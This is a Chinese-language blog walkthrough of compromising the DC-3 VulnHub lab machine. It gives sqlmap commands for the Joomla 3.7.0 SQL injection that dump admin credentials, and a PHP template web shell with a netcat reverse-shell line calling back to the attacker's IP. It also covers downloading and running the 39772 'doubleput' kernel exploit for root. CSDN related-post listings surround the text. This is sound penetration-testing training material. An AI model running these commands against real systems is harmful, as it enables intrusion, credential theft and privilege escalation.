DC靶机系列:DC-3

最新推荐文章于 2024-05-08 16:59:31 发布
最新推荐文章于 2024-05-08 16:59:31 发布
阅读量227 收藏
点赞数 1
分类专栏: 渗透项目 文章标签: web安全 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938645/article/details/129170051
版权

一、信息收集

  1. 查询本机ip及目标靶机ip

本机ip:192.168.56.104,利用nmap查询同网段存活的ip,或者使用arp-scan -l

靶机ip为:192.168.56.112,下一步收集靶机开放的端口信息

  1. 收集靶机开放端口

输入nmap -sS -sV -T5 -A 192.168.56.112 搜索相应开放的端口及服务还有版本

发现只有80端口,同时也发现了个Joomla的cms框架,该框架最新的cve-2023-23752,将在后面更新,一个未授权访问漏洞,Joomla! CMS 版本4.0.0 - 4.2.7中由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。鉴于该漏洞影响较大,建议客户尽快做好自查及防护。

  1. 对应端口进行尝试

这里介绍一个新工具joomscan,后面将会和wpscan同时更新一篇文章,这里就先利用了

输入joomscan --url 192.168.56.112

检测到了很多目录,浏览器输入地址后发现

这里说,该靶机仅有一个flag,应该是需要提权后才可以查看的到,这边发现了个登录框,去漏洞库里查找下看是否存在sql注入的漏洞

二、Web渗透

输入searchsploit joomla 3.7.0 -w,如果不知道如何利用,可以看后面的url,里面有方式

直接上sqlmap,进行注入

sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

发现了joomladb的数据库,继续报数据表

sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables

爆出来了n多张表,这里,根据users表,爆出用户名和密码

sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump

发现了admin用户和它的password,将password复制粘贴到一个txt文档中,进行密码破解

我这边已经破解过了,用户名admin、密码snoopy

登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录

新建个shell.php文件,然后去网上找个反弹shell脚本或者自己简单的写一个

<?php 
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 4444 >/tmp/f');
?>

然后保存该文件,在终端nc -vlp 4444端口,网页访问/templates/beez3/shell.php,即可反弹一个低权限的shell,然后键入

python -c 'import pty;pty.spawn("/bin/bash")'

获取到了低权限的下一步就是提权了,首先搜集有关靶机的信息,输入

uname -a
lsb_release -a

发现ubuntu 16.04 4.4.0,在本地终端搜索相关的exp

searchsploit ubuntu 16.04 4.4.x -w

打开后面的url,可以知晓如何使用该exp

下载这个39772.zip到本地,并且解压

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

在本地开启http.server服务,在shell中下载攻击机上下载的39772.zip压缩包

使用unzip解压后得到39772文件夹,里面还有两个tar的压缩包,使用tar -xvf exploit.tar

解压后进入该文件夹,运行./compile.sh,会编译出doubleput可执行文件,然后./doubleput即可提权为root

在root目录下即可获得flag,本次DC项目的第三台靶机渗透结束。

注意:Linux kernel replace_map_fd_with_map_ptr拒绝服务漏洞(CVE-2016-4557)

Linux Kernel是Linux操作系统的内核。

Linux kernel 4.5.5之前版本,kernel/bpf/verifier.c/replace_map_fd_with_map_ptr未正确维护fd数据结构,存在安全漏洞,可使本地用户造成拒绝服务或提升权限。

每天学习一丢丢,进步一丢丢!!

Ays.Ie
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机实战-DC-3
滕财然的博客
01-31 2959
DC-3靶机实战 文章目录DC-3靶机实战1、主机发现2、端口扫描及端口详细信息3、访问web服务(80端口)4、web渗透 没有IP时先修改靶机root密码,然后配置IP 参考链接: https://blog.csdn.net/u014717036/article/details/53455563 1、主机发现 目标ip:192.168.232.167 2、端口扫描及端口详细信息 只开放...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
2024年Linux最全DC3靶机练习(1),看完直接怼项目经理,2024年最新Linux运维架构组件Room功能详解
最新发布
qq194582923的博客
05-08 733
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
DC-3靶机
weixin_73668856的博客
01-20 193
dc-3靶机的复现
DC3靶机
PigLL的博客
08-11 409
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
【vulnhub靶机DC-3
travelnight的博客
03-10 4831
原知识星球老文搬运 拿到靶机之后导入到virtualBOX里面。 1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。 2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。 3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。 4.御剑扫描一下,发现后台页面。这个是joomlaCMS 5.参考了下知乎的这个joomla渗透,https
CTF靶机 DC-3
weixin_52221158的博客
09-02 827
CTF靶场 DC-3详细讲解
渗透测试:DC-3靶机
Ciyaso的博客
08-16 441
零、修改网卡 扫不到iP需要修改网卡 打卡DC-3时进入这个界面按e键 然后找到g–root 将其后面的值从ro改成rw signie init=/bin/bash 按下Ctrl键+X键进入命令行 查看当前网卡IP信息 ip a,网卡名ens33 编辑网卡配置文件vim /etc/network/interfaces 重启网卡服务/etc/init.d/networking restart,再看看ip a 发现已有ip 一、扫描获取靶机ip arp-scan -l 192.168.203.1
065 渗透测试实战,靶机 DC-3
鸡蛋炒鸡蛋
04-27 753
文章目录
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4247
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
DC靶机系列(三)
weixin_44385449的博客
03-18 244
内网探测找到ip 访问并指纹识别 joomscan扫一下 得到敏感目录、后台、及详细版本 google一下 有现成的可以用,相关复现请移步https://paper.seebug.org/305/ payload使用http://ip/index.php?option=com_fields&view=fields&layout=modal&list[fullorderi...
靶机渗透DC-3
weixin_44801963的博客
11-01 257
文章目录一、环境准备KaliDC-3二、渗透步骤1、信息收集2、漏洞探测3、漏洞利用1、SQL注入漏洞利用2、任意文件执行漏洞4、权限提升5、Get flag三、Have Fun 一、环境准备 Kali DC-3 下载官网:https://www.five86.com/ 二、渗透步骤 1、信息收集 主机发现 目标端口扫描 访问80服务 网站指纹识别 Joomla CMS扫描 扫除管理员登录界面 . 2、漏洞探测 查询 joomla 3.7.0已知的漏洞 3、漏洞利用 1、SQL注入漏洞利用
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值